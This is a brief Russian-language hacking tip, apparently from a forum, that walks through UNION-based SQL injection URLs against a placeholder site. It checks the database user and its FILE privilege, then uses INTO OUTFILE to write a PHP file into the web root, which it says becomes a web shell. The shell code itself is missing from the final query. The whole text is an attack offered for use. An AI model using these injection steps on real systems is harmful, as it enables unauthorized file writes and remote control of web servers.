Сначала посмотри File_priv. Для этого:

http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f

Копируем юзера.

http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f

Если выведет N, то залить не получится. Если Y + mq=off, то:

http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f

После этого шелл будет по адресу site.ltd/dir/file.php